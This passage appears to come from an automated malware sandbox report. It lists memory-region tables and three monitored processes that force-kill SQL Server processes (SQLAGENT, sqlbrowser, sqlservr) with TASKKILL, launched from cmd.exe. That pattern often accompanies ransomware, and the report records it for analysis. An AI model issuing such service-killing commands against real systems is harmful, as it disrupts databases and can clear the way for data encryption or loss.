| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #33 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM SQLAGENT.exe /IM SQLAGENT.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:04 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xa44 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A5C
0x
A60
0x
A4C
0x
A64
0x
A68
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000f0000 | 0x000f0000 | 0x000fffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00100000 | 0x00103fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000200000 | 0x00200000 | 0x0023ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000240000 | 0x00240000 | 0x00240fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x002f0000 | 0x003affff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000003c0000 | 0x003c0000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000470000 | 0x00470000 | 0x004affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004e0000 | 0x004e0000 | 0x0051ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000540000 | 0x00540000 | 0x0057ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00590000 | 0x005a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000005b0000 | 0x005b0000 | 0x006affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000730000 | 0x00730000 | 0x0082ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000830000 | 0x00830000 | 0x009b7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x00b40fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000b50000 | 0x00b50000 | 0x01f4ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01f50000 | 0x0221efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002240000 | 0x02240000 | 0x0227ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022b0000 | 0x022b0000 | 0x022effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002380000 | 0x02380000 | 0x023bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000024a0000 | 0x024a0000 | 0x024dffff | Private Memory | Readable, Writable |
|
|
|
|
| ntdsapi.dll | 0x6a4b0000 | 0x6a4c7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a4d0000 | 0x6a565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a570000 | 0x6a57efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a580000 | 0x6a5a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a5b0000 | 0x6a60bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a720000 | 0x6a729fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a7b0000 | 0x6a89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a8a0000 | 0x6a8aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a8b0000 | 0x6a8c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x6a8d0000 | 0x6a8dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a8e0000 | 0x6a914fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x73e30000 | 0x73e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #34 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM sqlbrowser.exe /IM sqlbrowser.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:04 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xa8c |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A98
0x
A50
0x
A40
0x
A3C
0x
A2C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x000f0000 | 0x000f3fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00170000 | 0x0022ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000370000 | 0x00370000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003d0000 | 0x003d0000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00490000 | 0x004a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000004b0000 | 0x004b0000 | 0x005affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000610000 | 0x00610000 | 0x0070ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000710000 | 0x00710000 | 0x00897fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000008a0000 | 0x008a0000 | 0x008affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a30fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x01e3ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001e90000 | 0x01e90000 | 0x01ecffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f00000 | 0x01f00000 | 0x01f3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f70000 | 0x01f70000 | 0x01faffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002010000 | 0x02010000 | 0x0204ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002090000 | 0x02090000 | 0x020cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002110000 | 0x02110000 | 0x0214ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002220000 | 0x02220000 | 0x0225ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02260000 | 0x0252efff | Memory Mapped File | Readable |
|
|
|
|
| fastprox.dll | 0x6a480000 | 0x6a515fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a520000 | 0x6a60afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x6a7d0000 | 0x6a7e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a7f0000 | 0x6a7fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a800000 | 0x6a828fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a830000 | 0x6a88bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a890000 | 0x6a899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a8a0000 | 0x6a8d4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a8e0000 | 0x6a8eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x6a8f0000 | 0x6a8f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a900000 | 0x6a910fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73e30000 | 0x73e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #35 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM sqlservr.exe /IM sqlservr.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:03 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xa38 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A30
0x
A8
0x
B74
0x
B88
0x
AB8
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00110000 | 0x00176fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000001a0000 | 0x001a0000 | 0x001dffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x001e0000 | 0x0029ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000360000 | 0x00360000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000420000 | 0x00420000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004b0000 | 0x004b0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004f0000 | 0x004f0000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000560000 | 0x00560000 | 0x0065ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000670000 | 0x00670000 | 0x006affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006d0000 | 0x006d0000 | 0x0070ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000750000 | 0x00750000 | 0x0078ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00790000 | 0x007a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x00937fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000940000 | 0x00940000 | 0x00ac0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x01ecffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001ed0000 | 0x01ed0000 | 0x01fcffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002070000 | 0x02070000 | 0x020affff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x020b0000 | 0x0237efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002380000 | 0x02380000 | 0x023bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023c0000 | 0x023c0000 | 0x023fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002430000 | 0x02430000 | 0x0246ffff | Private Memory | Readable, Writable |
|
|
|
|
| fastprox.dll | 0x6a570000 | 0x6a605fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a830000 | 0x6a91afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
